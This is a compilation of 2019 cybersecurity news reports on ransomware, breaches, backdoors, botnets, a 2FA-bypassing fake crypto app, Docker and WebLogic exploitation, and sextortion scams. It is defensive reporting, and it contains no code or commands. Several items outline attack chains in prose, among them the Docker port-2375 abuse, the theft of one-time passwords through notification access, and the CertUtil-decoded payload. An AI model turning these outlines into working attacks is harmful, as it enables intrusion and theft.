The Riviera Beach City, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system.
The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council has previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s system three weeks ago, ecrypting data managed by the City.
The internal IT staff has been working with security consultants to restore the operations, but according to them the only way to decrypt the information was to pay the ransom.
“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press.“Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”
The attack began on May 29, the infection started when an employee at the Riviera Beach police department opened a malicious email containing a link that once clicked has allowed infecting the PC.
The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems. The email system was disabled, employees and vendors were paid by check rather than direct deposit, the communications went down, 911 dispatchers being unable to accept calls even if the service continues to operate.
Initially, the city council decided to not pay the ransom, but due to the difficulties in restoring the operations, it opted out to pay.
On Monday, city officials participating to a rapid meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).
“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”
In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.
In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.
“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.
Eatstreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of partners
EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of delivery and restaurant partners
Attackers breached the company network on May 3 stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.
Stolen data includes names, addresses, phone numbers, email addresses, as well as financial data (i.e. bank accounts, routing numbers, credit card numbers, expiration dates and card verification codes), billing addresses)..
“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.
EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” the company’s Android app has over 100,000 installs as of June 5.
EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”
At the time, law enforcement agencies are not investigating the incident:
“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”
“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices,”
According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines because between February and April disclosed the existence of some massive unreported data breaches in fifth rounds. The list of victims includes Canva, 500px, UnderArmor, ShareThis, GfyCat, Ge.tt, Evite, and others.
The hacker took credit for the data breach while discussing with ZDNet about the Canva hack allegations last month.
At the time it is not clear the extent of the security breach, but the hacker claimed he stole over six million user records.
“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies. “
Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware.
Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware.
The Plurox backdoor is written in C and compiled with Mingw GCC, it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure, it uses a variety of plugins to implements its functionalities.
“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”
The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.
The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware.
Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.
The Plurox backdoor supports the following commands:
Download and run files using WinAPI CreateProcess
Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
Download and run plugin
Update plugin (stop process and delete file of old version, load and start new one)
Stop and delete plugin
The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.
The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd.
Experts also discovered that the Plurox backdoor also supports a UPnP plugin designed to target a local network.
“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.
In case the administrators will detect the attack on the host, they will see the attack coming directly from the router, not from a local machine.
The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139.
Expert discovered a new technique bypassing SMS-based two-factor authentication while circumventing Google’s recent SMS permissions restrictions
The popular security expert Lukas Stefanko from ESET discovered some apps (namedBTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange, BtcTurk, in the attempt of stealing login credentials.
In order to steal the 2FA OTPs the apps read the credentials that appear in 2FA notifications from the service, instead of intercepting the SMS messages delivering them,
Stefanko explained that the new increasing interest in Bitcoin is associated with the growth of its price.
“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.
“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”
When the apps are executed for the first time they request ‘notification access’ permission that is used to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.
Once the permission is granted to the apps, they will display a fake login message asking for the user’s BtcTurk login credentials. Once the users will provide the credentials, the apps display a false error message.
“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).
In the meantime, the login credentials for the services are sent back to the attacker’s server.
At this point, the rogue apps leverage the notifications access permission to read all incoming notifications and select the ones related to applications of interest. The apps read the notifications associated with apps whose names contain the keywords, gm, yandex, mail, k9, outlook, SMS, and messaging. These notifications are sent to the attacker, who select the ones containing the one-time passwords used in 2FA.
“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.
At this point, it is easy for the attackers to impersonate the victims while attempt to access the services. Any 2FA OTP can be dismissed from the victim’s phone and sent to the attacker, the attacker with this scheme has access to login credentials and OTP and can use them to access the account.
Experts at ESET are warning of the rapid spread of this technique that was recently observed in attacks against users of the Turkish Koineks exchange. ESET believes that the threat actor behind the attacks was the same.
“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks(kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”
“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”
Experts believe that crooks will start using this technique against target in other industries, including banks and financial institutions.
Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.
Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a free decryptor tool released on the the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.
“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by the Eurpol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”
The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.
The ransomware appeared in the threat landscape early 2018 when experts at cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian hacking community on the dark web, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.
In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.
The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators also declared to have earned a net of $150 million that now have invested in legal activities.
Experts at BitDefender pointed out that not all victims are treated equally:
“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”
According to the Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms.
The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat.
You can download the GandGrab decryption tool for free at the following address:
Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.
Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.
The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.
Threat actors are using the RAT to deliver keyloggers and information stealers.
“The Cofense Phishing Defense Center (PDC) and Cofense Intelligence have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofence. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing. “
WSH Remote Access Tool (RAT) is a variant of the VBS (Visual Basic Script) based Houdini Worm (H-Worm) that first appeared in the threat landscape in 2013 and was updated in 2016.
The phishing messages contain an MHT file that includes a href link which once opened, will direct victims to a .zip archive containing a version of WSH RAT.
The RAT allows attackers to steal sensitive data, including passwords from victims’ browsers and email clients, it also implements keylogging capabilities. The experts pointed out that the RAT allows to remotely control the victim’s systems, it is also able to kill anti-malware solutions and disable the Windows UAC.
The authors of the malware are offering for rent the WSH RAT, buyers can pay a subscription fee of $50 per month to use all features they have implemented.
“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”
Once the RAT reached the C2 server, WSH RAT will download and drop three additional files having .tar.gz extension but that are actually PE32 executable files
The three downloaded payloads are a keylogger, a mail credential viewer, a browser credential viewer. The three components are from third parties and were not developed by the WSH RAT operator.
The three malicious tools are a keylogger, a mail credential viewer, and a browser credential viewer developed by third parties and used by the campaign operators to collect credentials and other sensitive information.
“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.
Experts published a list of indicators of compromise (IOCs).
Bella Thorne is the last victim of asextortion attack, in a case similar to the Fappening saga, a hacker threatened the actress to publish her private nude photos.
The hacker first obtained nude photos of Bella Thorne then threatened her to leak online the picture, but she gave an unsettling answer.
Bella Thorne published tweets of the stolen photos putting the hacker out of play.
The actress explained she has been harassed for the past 24 hours by a hacker who accessed to her nude photos.
The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.
“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.
“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”
Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.
Recently a new botnet, tracked Echobot, appeared in the threat landscape its operators are adding new exploits to infect a broad range of systems, including IoT devices, enterprise apps Oracle WebLogic and VMware SD-Wan.
The Echobot botnet was first detected by experts at PaloAlto Networks early this month, the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators added 8 new exploits, but currently, it includes 26 exploits.
The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.
“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.
“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”
Cashdollar published a table comparing the two versions of Echobot and the exploits they use.
The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.
The experts pointed out that was not simple to determine the vulnerabilities that were being exploited by the botnet because some of them had no CVE numbers assigned.
After the contacted MITRE, the organizations assigned them identification numbers.
Below the list of the exploits included in the Echobot variant discovered by the expert, some of the flaws triggered by the bot are decade-old vulnerabilities:
The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.
“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.
“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”
Botnet operators continue to implement new methods to make their malware more aggressive and to infect the larger number of systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.
“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.
“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”
Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.
Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).
Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver a malicious code that drops the AESDDoS Trojan.
“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”
The AESDDoS malware is active since at least since 2014 and it was used to build large DDoS botnet. in some cases, it was also used in cryptojacking campaigns.
In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.
“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.
We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”
The malware also collects system information and send it back to the C2, depending on the specific hardware configuration the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacker, mining cryptocurrency, etc.)
In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.
The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.
The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).
In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.
In order to secure Docker hosts admins should allow only trusted sources to access the Docker API, below some recommendations provided by Trend Micro.
“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.
“To prevent container-based incidents from happening, organizations can follow these guidelines:
The gaming industry, in general, is aware that attempts to login and other forms credential abuse is a problem. But maybe not as aware that they should be.
According to a new Akamai report, hackers are using new methods to evade detection. Many organizations do not follow the scope and complexity of the problem of identity theft.
The State of the Internet Report: The Company’s 2019 Web Gambling and Gambling Abuse Web Sites, published at the annual Akamai Edge World event, revealed that hackers had made more than 12 billion attacks in gaming site between late 2017 and March of this year, qualifying the gamer community as one of the most aggressive targets for these attacks and one of the most lucrative for cybercriminals.
In total, gambling sites accounted for more attacks aimed at obtaining identification information in all sectors during the investigation period by Akamai.
“One reason that we believe the gaming industry is an attractive target for hackers is that criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher for Akamai and editorial director of the report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”
The Akamai report also pointed out that SQL injection attacks (SQLi) accounted for about two-thirds of all Web application attacks, while Local File Inclusion (LFI) attacks accounted for about a quarter.
The report points out that most credential stuffing lists circulate online usage data from well-known large-scale data breaches, and that many of them are rooted in SQLi.
An Akamai press release says its researchers have discovered a video explaining to users how to perform SQLi attacks against websites and using the credentials obtained to generate lists that can be used for the credential stuffing against online games.
“As gaming companies continue to innovate and improve their defenses, they must also continue to educate their consumers on how to protect themselves and defend themselves. Many players are young and if they learn best practices to protect their accounts, they will incorporate them for the rest of their lives,” McKeay said.
The Akamai report shows that more than two-thirds of application layer attacks are directed against US-based organizations, and Russia and Canada occupy positions No. 1 and No. 2 for the gambling sector, in terms of sources of attack. “Attackers see the credential abuse as a low-risk venture with a potential for a high payout, at least for now,” Akamai’s report reads. “
The report notes that hackers tend to give more value to compromised accounts related to valid credit cards and other financial links. Once these accounts are compromised, they will buy additional items, including the currencies used in the games.
These types of attacks are more likely to increase in the future. As with many other types of attacks, the important thing is that a user should keep in mind that attacks occur so that you can find ways to defend your business against them.
After two years of silence, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry employing the ShellTea/PunchBuggy backdoor.
Two years later after the last report, FIN8 group is back and carried out a new campaign against the hotel-entertainment industry using an improved version of the ShellTea/PunchBuggy backdoor.
The last time security experts documented the FIN8’s activities was in 2016 and 2017. At the time, FireEye and root9B published detailed reports about a series of attacks targeting the retail sector.
FireEye documented obfuscation techniques used by the group in June 2017 and the involvement of PUNCHTRACK POS-scraping malware.
The ShellTea backdoor was analyzed by researchers Root9b in June 2017, the malware was used by threat actors to deliver the PoC malware.
Now experts at Morphisec revealed to have observed a new campaign attributed to the FIN8 group that targeted entities in the hotel-entertainment industry.
“During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea / PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.” reads the analysis published by Morphisec. “It is believed that the malware was deployed as a result of several phishing attempts.”
Experts believe the attackers launched phishing attacks in the attempt of delivering PoS malware.
Researchers also gathered evidence of overlap between FIN8 and FIN7 attacks, even if the two groups are considered separated.
“Given the nature of the industry targeted in the attack uncovered by Morphisec, we assume that this was also an attempted POS attack.” continues the analysis. “In this report, we investigate this latest variant of ShellTea, together with the artifacts it downloaded after the Morphisec Labs team detonated a sample in a safe environment.”
The attack chain starts with a fileless dropper using PowerShell code executed from registry keys and leading to ShellTea.
The ShellTea attempt to evade detection by checking the presence of virtualized environments and standard analysis tools. The malicious code uses a hacking algorithm for most of its functions, the algorithm is similar to the one implemented for previous ShellTea version.
ShellTea is then injected into Explorer, it communicates with the C2 over HTTPs and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using downloaded native Empire ReflectivePicker, and of course downloading and executing a POS malware.
Attackers use the PowerShell script to collect information on the user and the network, then sends Gzipped data to the C2 and delete it.
Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.
“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8,we’ve seen multiple attacks by FIN6, FIN7 and others.” concludes Morphisec.
“Many POS networks are running on the POS version of Window 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.” ” As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses. “
Every month, we dig through cybersecurity trends and advice for our readers. This edition: GDPR+1, the cost of cybercrime revealed, and a ransomware racket.
If you notice this notice…
If year one of GDPR has taught us anything, it’s that we can expect more data breach reports, which means more notifications. Most national supervisory authorities saw an increase in queries and complaints compared to 2017, the European Data Protection Board found.
But are companies following through with breach notifications that are effective, and easy to understand? Possibly not. Researchers from the University of Michigan analysed 161 sample notifications using readability guidelines, and found confusing language that doesn’t clarify whether consumers’ private data is at risk.
The researchers had previously found that people often don’t take action after being informed of a data breach. Their new findings suggest a possible connection with poorly worded notifications. That’s why the report recommends three steps for creating more usable and informative breach notifications.
Pay more attention to visual attractiveness (headings, lists and text formatting) and visually highlight key information.
Make the notice readable and understandable to everyone by using short sentences, common words (and very little jargon), and by not including unnecessary information.
Avoid hedge terms and wording claims like “there is no evidence of misuse”, because consumers could misinterpret this as as evidence of absence of risk).
AT&T inadvertently gave an insight into its own communications process after mistakenly publishing a data breach notice recently. Vice Motherboard picked up the story, and pointed out that its actions would have alarmed some users. But it also reckoned AT&T deserves praise for having a placeholder page ready in case of a real breach. Hear, hear. At BH Consulting, we’re big advocates of advance planning for potential incidents.
The cost of cybercrime, updated
Around half of all property crime is now online, when measured by volume and value. That’s the key takeaway from a new academic paper on the cost of cybercrime. A team of nine researchers from Europe and the USA originally published work on this field in 2012 and wanted to evaluate what’s changed. Since then, consumers have moved en masse to smartphones over PCs, but the pattern of cybercrime is much the same.
The body of the report looks at what’s known about the various types of crime and what’s changed since 2012. It covers online card frauds, ransomware and cryptocrime, fake antivirus and tech support scams, business email compromise, telecoms fraud along with other related crimes. Some of these crimes have become more prominent, and there’s also been fallout from cyberweapons like the NotPetya worm. It’s not all bad news: crimes that infringe intellectual property are down since 2012.
Ross Anderson, professor of security engineering at Cambridge University and a contributor to the research, has written a short summary. The full 32-page study is free to download as a PDF here.
Meanwhile, one expert has estimated fraud and cybercrime costs Irish businesses and the State a staggering €3.5bn per year. Dermot Shea, chief of detectives with the NYPD, said the law is often behind criminals. His sentiments match those of the researchers above. They concluded: “The core problem is that many cybercriminals operate with near-complete impunity… we should certainly spend an awful lot more on catching and punishing the perpetrators.” Speaking of which, Europol released an infographic showing how the GozNym criminal network operated, following the arrest of 10 people connected with the gang.
Any ransomware victim will know that their options are limited: restore inaccessible data from backups (assuming they exist), or grudgingly pay the criminals because they need that data badly. The perpetrators often impose time limits to amp up the psychological squeeze, making marks feel like they have no other choice.
Enter third-party companies that claim to recover data on victims’ behalf. Could be a pricey but risk-free option? It turns out, maybe not. If it sounds too good to be true, it probably is. And that’s just what some top-quality sleuthing by ProPublica unearthed. It found two companies that just paid the ransom and pocketed the profit, without telling law enforcement or their customers.
This is important because ransomware is showing no signs of stopping. Fortinet’s latest Q1 2019 global threat report said these types of attacks are becoming targeted. Criminals are customising some variants to go after high-value targets and to gain privileged access to the network. Figures from Microsoft suggest ransomware infection levels in Ireland dropped by 60 per cent. Our own Brian Honan cautioned that last year’s figures might look good just because 2017 was a blockbuster year that featured WannaCry and NotPetya.
Links we liked
Finally, here are some cybersecurity stories, articles, think pieces and research we enjoyed reading over the past month.
If you confuse them, you lose them: a post about clear security communication. MORE
This detailed Wired report suggests Bluetooth’s complexity is making it hard to secure. MORE
Got an idea for a cybersecurity company? ENISA has published expert help for startups. MORE
A cybersecurity apprenticeship aims to provide a talent pipeline for employers. MORE
Remember the Mirai botnet malware for DDoS attacks? There’s a new variant in town. MORE
The hacker and pentester Tinker shares his experience in a revealing interview. MORE
So it turns out most hackers for hire are just scammers. MORE
The cybersecurity landscape and the role of the military. MORE
What are you doing this afternoon? Just deleting my private information from the web. MORE
The CVE-2019-2725 vulnerability in Oracle WebLogic recently, addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.
Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.
The flaw is a deserialization remote command execution zero-day vulnerability that affects the Oracle WebLogic wls9_async and wls–wsat components.
The issue affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.
Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.
An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.
The CVE-2019-2725 flaw was patched in late April, unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.
After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.
The malware used in this campaign hides its malicious codes in certificate files to evade detection.
Once the malware is executed it exploits the CVE-2019-2725 flaw to execute a command and perform a series of routines.
“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.
“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”
The attack chains starts with a PowerShell that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then execute it using PowerShell. The downloaded file is then deleted using cmd.
The certificate file appears as a Privacy-Enhanced Mail (PEM) format certificate, it is in the form of a PowerShell command instead of the X.509 TLS file format.
“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”
The command in the certificate file is used by crooks to download and execute another PowerShell script in memory. The script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script in memory), Sysguard .exe (watchdog for the miner process), and Clean.bat (deletes other components).
Experts noticed that the update.ps1 file that contains the decoded certificate file is replaced with the new update.ps1 and a scheduled task is created to execute the new PowerShell script every 30 minutes.
The idea of hiding malware into certificate is not a novelty, experts at Sophos explored this technique in a proof of concept late last year.
“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”
Crooks are posing as CIA agents in a sextortion campaign, they are sending emails to inform the victims of an investigation into online pedophilia rings.
Crooks are posing as CIA agents in a new sextortion campaign, they are sending emails to inform potential victims of an ongoing investigation into online pedophilia rings.
Fraudsters are offering to drop the investigations on the victims for money, according to experts at Kaspersky.
“The author of the e-mails that caught our experts’ collective eye poses as a CIA officer who has allegedly found the recipient’s details in Case #45361978 (relating to possession and distribution of child pornography, or so it seems). ” reads a post published by Kaspersky. “The “officer” states that the CIA is about to swoop in on more than 2,000 individuals suspected of pedophilia in 27 countries around the globe. The message implies that the recipient is accused of being one of them. “
Crooks claim they are conducting a “large international operation set to arrest more than 2000 individuals in 27 countries.”
In order to scare people and trick them into paying, the fraudsters claim to have collected evidence of the illegal activities, they are telling the victims that they have collected the mark’s home and work addresses, contact information, they also claim to have recorded each recipient’s ISP and browsing history, social media activity. chat logs, and also Tor browsing activity,
The fake CIA agents are offering to drop the investigation and destroy the evidence for a $10,000 Bitcoin payout.
“I read the documentation and I know you are a wealthy person who may be concerned about reputation,” reads the scam email message sent to the victims. “I am one of several people who have access to those documents and I have enough security clearance to amend and remove your details from this case.”
Sextortion campaigns are not a novelty in the threat landscape, in most cases, victims concern of reputational damage in case hackers will expose their immoral habits to friends and colleagues.
The messages used in the “CIA” sextortion campaign are well-written with a good layout, they appear as authentic.
“Such messages are sent to thousands or even millions of people in the hope that just a handful will swallow the bait,” explained Kaspersky senior anti-spam analyst Tatyana Scherbakova.
“Given the size of the ransom, if even a few victims pay up, it will have been worth the cybercriminals’ time and effort.”
Below the recommendations provided by Kaspersky:
Never pay scammers; that would only encourage the extortionists even more.
